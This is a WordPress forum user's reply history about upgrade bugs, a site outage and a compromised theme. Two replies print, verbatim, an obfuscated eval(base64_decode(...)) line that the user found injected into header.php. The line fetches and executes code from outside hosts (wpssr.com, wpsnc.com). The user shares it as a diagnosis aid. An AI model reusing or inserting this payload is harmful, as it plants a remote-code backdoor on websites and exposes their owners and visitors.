hhall72
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: Post tags not working in 2.8.1Sorry patsy26,
That doesn’t fix anything for me. I don’t have DB cache installed and the problem is the same.
I also just upgraded to 2.8.2, with no change in the problem.
Additionally, I get nothing from clicking the “edit” links next to “Status: Draft”, “Visibility: Public” and “Publish immediately” items on the edit post page. This can’t just be happening to a few people, can it?
Forum: Fixing WordPress
In reply to: Tags missing after ugrade to 2.8.1Ditto here. I was redirected to this post from my forum post on this problem. I also don’t have DB cache installed and the problem is the same.
I just upgraded to 2.8.2, with no change in the problem.
Additionally, I get nothing from clicking the “edit” links next to “Status: Draft”, “Visibility: Public” and “Publish immediately” items on the edit post page. This can’t just be happening to a few people, can it?
Forum: Fixing WordPress
In reply to: Theme’s background color loads, but nothing elseiridiax,
Here it is in its entirety:
<?php if ( function_exists('register_sidebar') ) register_sidebars(3);?>
Forum: Themes and Templates
In reply to: Warning at the top of pageWombo55,
I ran into an obnoxious code snippet when I went through my header.php again. The snippet appears right after the “<body>” tag in that file. It looked like this:
<?php eval(base64_decode('aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNzci5jb20iLCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3Bzc3IiOyBlbHNlaWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNuYy5jb20iLCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMiOyBlbHNlICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMyIjsgQGV2YWwoJyRSMTRBRjFCRTlFRTI2QTkwOTIxRTY0QTgyRTc4MzY3OTcgPSAxOycpOyBpZigkUjE0QUYxQkU5RUUyNkE5MDkyMUU2NEE4MkU3ODM2Nzk3IEFORCBpbmlfZ2V0KCdhbGxvd191cmxfZm9wZW4nKSkgeyAgJFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5NiA9ICIxIjsgICRSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTNFRDlFMUIxMTUgPSAiaHR0cDovL3d3dy4kUjUwRjVGOUM4MEYxMkZGQUU4QjI0MDA1MjhFODFCMzRFLmNvbS93JFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5Ni5waHA/dXJsPSIuIHVybGVuY29kZSgkX1NFUlZFUlsnUkVRVUVTVF9VUkknXSkgLiImIi4gImhvc3Q9Ii4gdXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0hPU1QnXSk7ICAkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCRSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTNFRDlFMUIxMTUpOyAgQGV2YWwoJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCk7IH0gZWxzZSB7ICAkUkQzRkU5QzEwQTgwOEE1NEVBMkEzREJEOUU2MDVCNjk2ID0gIjAiOyAgJFI2RTRGMTRCMzM1MjQzQkU2NTZDNjVFM0VEOUUxQjExNSA9ICJodHRwOi8vd3d3LiRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUuY29tL3ckUkQzRkU5QzEwQTgwOEE1NEVBMkEzREJEOUU2MDVCNjk2LnBocD91cmw9Ii4gdXJsZW5jb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSAuIiYiLiAiaG9zdD0iLiB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddKTsgIEByZWFkZmlsZSgkUjZFNEYxNEIzMzUyNDNCRTY1NkM2NUUzRUQ5RTFCMTE1KTsgfSBmY2xvc2UoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNik7')); ?>
It was not in the file when I originally downloaded the theme months ago, and I’m not sure why or how it got there, but once I deleted it and updated the file, the site showed no problems anymore.
Maybe if others are having this issue, they can fix it by deleting that snippet as well.
That said, I’d still love to know how it got there.
Forum: Fixing WordPress
In reply to: Theme’s background color loads, but nothing elsestvwlf,
That’s what confuses me — it does not appear in the original file on my computer, so I have no idea who put it there. Is there a way it could have been put there after I uploaded the theme?
Forum: Fixing WordPress
In reply to: Theme’s background color loads, but nothing elseOkay, I found the offending line:
<?php eval(base64_decode('aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNzci5jb20iLCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3Bzc3IiOyBlbHNlaWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNuYy5jb20iLCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMiOyBlbHNlICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMyIjsgQGV2YWwoJyRSMTRBRjFCRTlFRTI2QTkwOTIxRTY0QTgyRTc4MzY3OTcgPSAxOycpOyBpZigkUjE0QUYxQkU5RUUyNkE5MDkyMUU2NEE4MkU3ODM2Nzk3IEFORCBpbmlfZ2V0KCdhbGxvd191cmxfZm9wZW4nKSkgeyAgJFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5NiA9ICIxIjsgICRSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTNFRDlFMUIxMTUgPSAiaHR0cDovL3d3dy4kUjUwRjVGOUM4MEYxMkZGQUU4QjI0MDA1MjhFODFCMzRFLmNvbS93JFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5Ni5waHA/dXJsPSIuIHVybGVuY29kZSgkX1NFUlZFUlsnUkVRVUVTVF9VUkknXSkgLiImIi4gImhvc3Q9Ii4gdXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0hPU1QnXSk7ICAkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCRSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTNFRDlFMUIxMTUpOyAgQGV2YWwoJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCk7IH0gZWxzZSB7ICAkUkQzRkU5QzEwQTgwOEE1NEVBMkEzREJEOUU2MDVCNjk2ID0gIjAiOyAgJFI2RTRGMTRCMzM1MjQzQkU2NTZDNjVFM0VEOUUxQjExNSA9ICJodHRwOi8vd3d3LiRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUuY29tL3ckUkQzRkU5QzEwQTgwOEE1NEVBMkEzREJEOUU2MDVCNjk2LnBocD91cmw9Ii4gdXJsZW5jb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSAuIiYiLiAiaG9zdD0iLiB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddKTsgIEByZWFkZmlsZSgkUjZFNEYxNEIzMzUyNDNCRTY1NkM2NUUzRUQ5RTFCMTE1KTsgfSBmY2xvc2UoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNik7')); ?>
No idea whatsoever how it got there (if I put it there, I don’t know when or why, and it could not have been in the past six months), but once removed the site functions well again.
Thanks for the willingness to help out ??
Forum: Fixing WordPress
In reply to: Theme’s background color loads, but nothing elseI’ve added my concern to another post, which seems similar to my current issue:
https://www.ads-software.com/support/topic/268707?replies=5#post-1071788also, I’ve posted my header.php file at:
https://wordpress.pastebin.ca/1420238Forum: Themes and Templates
In reply to: Warning at the top of pageHi,
I am running into a similar message with my site (https://cybersteward.net) after having it down for unexplained reasons for over two days.
I’ve posted it at https://wordpress.pastebin.ca/1420238 in case anyone would be kind enough to help me figure out the problem.
Forum: Fixing WordPress
In reply to: Theme’s background color loads, but nothing elseI did the phpinfo file, but I couldn’t locate a “memory limit” number in the php core section.
That aside, the site came back online (for reasons unknown to me) later yesterday, but the following warning appears above the site content:
Warning: fclose(): supplied argument is not a valid stream resource in /home/content/c/y/b/cybersmedley/html/cs/wp-content/themes/quadruple-blue/header.php(20) : eval()’d code on line 1
I have no idea what it means. I’ve never altered the beginning of the header file and it appears to be in its original state. However when I switch themes, the warning does go away. I’m utterly perplexed.
Forum: Fixing WordPress
In reply to: Theme’s background color loads, but nothing elseI have no recently installed plugins, but I did have the mobile plugin sitting there. I just deleted it via ftp (I have no access to the admin section), but no luck yet.
Is there a way to switch themes and perform other admin tasks without admin access?
I am having the same issue with the openbluhosting.com link showing up in my blogroll, but I am running WordPress 2.7, and as far as I can tell, my plugins folder is not visible.
Any other issues that might be causing this?
Forum: Fixing WordPress
In reply to: Comments disappearing (possibly closing)Thank you, Samboll. I am an idiot — I don’t know how I didn’t notice this.
Now that I’ve found my comments, I’m wondering if there’s a way to use this setting without disappearing closed comments?